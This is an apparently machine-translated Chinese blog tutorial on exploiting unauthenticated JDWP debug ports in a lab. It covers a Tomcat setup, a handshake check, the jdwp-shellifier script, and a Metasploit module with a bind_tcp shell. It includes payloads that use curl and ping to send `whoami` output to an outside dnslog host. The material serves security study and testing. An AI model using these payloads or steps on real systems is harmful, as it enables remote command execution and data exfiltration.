当前位置：网站首页>Jdwp unauthorized rapid utilization

Jdwp unauthorized rapid utilization

2022-07-28 17:34:00 【itest_ two thousand and sixteen】

JDWP brief introduction

First of all, let's explain debugger and target vm.Target vm The program we want to debug is running in , It works with the general Java There's no difference between virtual machines , Just loaded at startup Agent JDWP So it has debugging function . and debugger It's known as the debugger , It's moving towards target vm Send a command to get target vm The state and control of the runtime Java Execution of procedures .Debugger and target vm Run in their own processes , The communication protocol between them is JDWP.

JDWP The handshake agreement

JDWP There are roughly two stages ： Handshake and answer . Handshake is after the establishment of the transport layer connection , The first thing to do ,Debugger send out 14 bytes String “JDWP-Handshake” To target Java virtual machine Target Java Virtual machine reply “JDWP-Handshake”

JDWPagent Role in debugging

Construction of experimental environment

Attack the machine kali IP：192.168.204.128

Drone aircraft centos7 IP：192.168.204.133

wget download Tomcat Installation package wgethttp://mirror.bit.edu.cn/apache/tomcat/tomcat-8/v8.5.43/bin/apache-tomcat-8.5.43.tar.gz
Unzip the installation package tar zxvf apache-tomcat-8.5.43.tar.gz
Copy the program to the specified running directory sudo mv apache-tomcat-8.5.43 /usr/local/tomcat8
Get into bin Catalog cd bin
find catalina.sh Add... To the first line of the file declare -xCATALINA_OPTS="-server -Xdebug -Xnoagent -Djava.compiler=NONE-Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000"
Use ./startup.sh start-up Tomcat

JDWP Service fingerprint discovery

We use first namp Scan and try

Nmap No detailed port services are output , Let's scan again

We use telnet ip port Then send it quickly JDWP-Handshake To simply verify whether there are unauthorized vulnerabilities , If the server also returns JDWP-Handshake Then nine times out of ten, there will be the loophole

Vulnerability exploitation methods

Use jdwp-shellifier Script for command execution
Use metasploit Exploit vulnerabilities
Use IntelliJ IDEA Editor for use ( There's a lot of space Prepare to talk about it next time )

Now let's show you how to use jdwp-shellifier Script pair JDWP Protocol unauthorized access vulnerability for command execution , First we need to arrive https://github.com/IOActive/jdwp-shellifier Download script

Read the author's README.md You can know the command format of using script

We come to our goal IP Try to use

We use it dnslog Try to test Tool website http://ceye.io/records/dns

You can see that there is no directory information returned , So let's go through ceye.io Test provided payloads To test

Liunx common payloads

curl http://ip.port.b182oj.ceye.io/`whoami`

ping `whoami`.ip.port.b182oj.ceye.io

windows common payloads

ping%USERNAME%.b182oj.ceye.io

Let's start with Metasploit Yes JDWP This vulnerability is exploited

We use msfconsole start-up Metasploit, And choose exploit/multi/misc/java_jdwp_debugger Exploit module

Use info You can view the current vulnerability EXP Information

We set up the target plane IP And vulnerability application port

Focus on ：

Because we usually carry out safety testing or penetration testing , Many of them work in Party A , The network environment in which we work will be very complex , When the author's notebook is connected to the company's Network , Neither access software nor security software allow me to build one nc Listening port , Usually when we test, we often use KALI The system also has no intranet IP, Then when we rebound, we can only establish one on the public network Metasploit Listening port , Some environments cannot connect to the public network after network isolation , Then we have to choose the forward connection back door at this time , Let me draw a picture to show you the general meaning .

Common Trojan horse classification

Msfvenom Easy to generate common Meterpreter Connect the rear door forward and backward

reverse_tcp
reverse_http
reverse_https
bind_tcp
These types of back doors are common in daily work , Only one bind_tcp It is positively connected

We are in the current EXP Use in showpayloads View the EXP Which loads are supported, that is, the back door

We set up EXP Use payloadlinux/x64/shell/bind_tcp load

Now all our configurations are complete , Finally, just enter run It can be executed directly , Now let's look at the implementation process

Through the above content, we briefly introduce JDWP Vulnerability information , Two utilization methods are also introduced through examples .jdwp-shellifier.py The advantage of scripts is that they are easy to deploy and use , The disadvantage is that echo is not performed .Metasploit Of JDWP Using the module is simple and fast to use and can execute system commands , however kali The system is a little bloated in some environments , Usually, when you use it yourself, you can choose it according to the corresponding scene . Well, that's all for today's article , Soon I will write an article using IntelliJ IDEA Editor for use JDWP Loophole , Describe in detail the principle and process of vulnerability utilization .

（ Please forward if you like , thank you ！）

Join beta future qq Group , Get more professional technical knowledge sharing ：

274166295 （ Love to test the future two groups ）

610934609 （ Love to test the future three groups ）

195730410 （ Love to test the future four groups ）

当前位置：网站首页>Jdwp unauthorized rapid utilization

Jdwp unauthorized rapid utilization

边栏推荐

猜你喜欢

随机推荐